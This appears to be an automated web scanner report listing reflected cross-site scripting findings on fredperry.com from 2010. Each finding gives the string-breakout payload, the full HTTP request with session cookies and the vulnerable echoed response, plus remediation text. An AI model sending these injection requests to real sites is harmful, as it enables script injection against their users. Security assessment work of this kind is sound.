The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7520f"-alert(1)-"65db163a491 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition7520f"-alert(1)-"65db163a491/men/bags/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:11:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=fba8t0ar5ln3ls253ccb9o12v2; expires=Tue, 09-Nov-2010 17:11:04 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition7520f"-alert(1)-"65db163a491/men/bags/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ca63"-alert(1)-"8f92cbce3aa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men7ca63"-alert(1)-"8f92cbce3aa/bags/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:11:23 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=28bt0rb15rjl4hvgp96soe7p70; expires=Tue, 09-Nov-2010 17:11:23 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men7ca63"-alert(1)-"8f92cbce3aa/bags/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22869"-alert(1)-"2f8729c9de1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/bags22869"-alert(1)-"2f8729c9de1/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:11:44 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=sc9er4klh7tb3b5pk845ru3dh5; expires=Tue, 09-Nov-2010 17:11:44 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29360
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/bags22869"-alert(1)-"2f8729c9de1/"); //]]> ...[SNIP]...
1.89. http://www.fredperry.com/limited-edition/men/bags/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/bags/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccefc"-alert(1)-"09f5c581780 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/bags/?ccefc"-alert(1)-"09f5c581780=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> Fred Pe ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/bags/?ccefc"-alert(1)-"09f5c581780=1"); //]]> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87410"-alert(1)-"642ea0df71f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition87410"-alert(1)-"642ea0df71f/men/blank-canvas-stussy/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:09:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=65n5cjmvruquljc1oa0u0lpv05; expires=Tue, 09-Nov-2010 17:09:41 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition87410"-alert(1)-"642ea0df71f/men/blank-canvas-stussy/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4bd9e"-alert(1)-"67a1afe9718 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men4bd9e"-alert(1)-"67a1afe9718/blank-canvas-stussy/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:10:19 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ge5scm29ad71fdltcr1kh3vfe2; expires=Tue, 09-Nov-2010 17:10:19 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men4bd9e"-alert(1)-"67a1afe9718/blank-canvas-stussy/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2afe3"-alert(1)-"17e2dabd41a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/blank-canvas-stussy2afe3"-alert(1)-"17e2dabd41a/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:10:40 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=eofi4cehnhrq7cjhic94pg8n24; expires=Tue, 09-Nov-2010 17:10:40 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/blank-canvas-stussy2afe3"-alert(1)-"17e2dabd41a/"); //]]> ...[SNIP]...
1.93. http://www.fredperry.com/limited-edition/men/blank-canvas-stussy/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/blank-canvas-stussy/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e98e0"-alert(1)-"c82982309e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/blank-canvas-stussy/?e98e0"-alert(1)-"c82982309e0=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47139"-alert(1)-"b6d2d00f18f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition47139"-alert(1)-"b6d2d00f18f/men/british-collectables/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:09 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=sfu3s4rje88g7t3ohsukesr565; expires=Tue, 09-Nov-2010 17:14:09 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29376
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition47139"-alert(1)-"b6d2d00f18f/men/british-collectables/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee4ce"-alert(1)-"3a91705cda8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/menee4ce"-alert(1)-"3a91705cda8/british-collectables/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:14:29 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=ols796ihtsstq0v73n79ngdik2; expires=Tue, 09-Nov-2010 17:14:30 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29376
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/menee4ce"-alert(1)-"3a91705cda8/british-collectables/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d891"-alert(1)-"954da85411 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/british-collectables7d891"-alert(1)-"954da85411/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:15:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=b1epgpls29dt2opr8uvoi9n5r4; expires=Tue, 09-Nov-2010 17:15:04 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/british-collectables7d891"-alert(1)-"954da85411/"); //]]> ...[SNIP]...
1.97. http://www.fredperry.com/limited-edition/men/british-collectables/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.fredperry.com
Path:
/limited-edition/men/british-collectables/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3a4d7"-alert(1)-"2d4c44a3758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/british-collectables/?3a4d7"-alert(1)-"2d4c44a3758=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7fe56"-alert(1)-"1a825ea7b3d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition7fe56"-alert(1)-"1a825ea7b3d/men/collaboration-raf-simons-centenary-outfit/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:12:49 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=i9k9giecjcr5q6n0askfpvs5f4; expires=Tue, 09-Nov-2010 17:12:49 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition7fe56"-alert(1)-"1a825ea7b3d/men/collaboration-raf-simons-centenary-outfit/"); //]]> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa46c"-alert(1)-"fd5429705a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/menaa46c"-alert(1)-"fd5429705a/collaboration-raf-simons-centenary-outfit/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:14 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=eiabdltr7afs24cjo1kl3f3fl4; expires=Tue, 09-Nov-2010 17:13:14 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29396
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/menaa46c"-alert(1)-"fd5429705a/collaboration-raf-simons-centenary-outfit/"); //]]> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f2872"-alert(1)-"429b7d0d03a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/collaboration-raf-simons-centenary-outfitf2872"-alert(1)-"429b7d0d03a/ HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
HTTP/1.1 404 Not Found Date: Tue, 09 Nov 2010 16:13:41 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.14 Set-Cookie: frontend=m9t2nujfnbq882ma058gmk5hq3; expires=Tue, 09-Nov-2010 17:13:42 GMT; path=/; domain=www.fredperry.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Status: 404 File not found Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 29397
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title> 404 Not ...[SNIP]... <![CDATA[ var pageTracker = _gat._getTracker("UA-10227276-1"); pageTracker._trackPageview("/limited-edition/men/collaboration-raf-simons-centenary-outfitf2872"-alert(1)-"429b7d0d03a/"); //]]> ...[SNIP]...
1.101. http://www.fredperry.com/limited-edition/men/collaboration-raf-simons-centenary-outfit/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 911a8"-alert(1)-"6872c7ca1c6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /limited-edition/men/collaboration-raf-simons-centenary-outfit/?911a8"-alert(1)-"6872c7ca1c6=1 HTTP/1.1 Host: www.fredperry.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;
Response
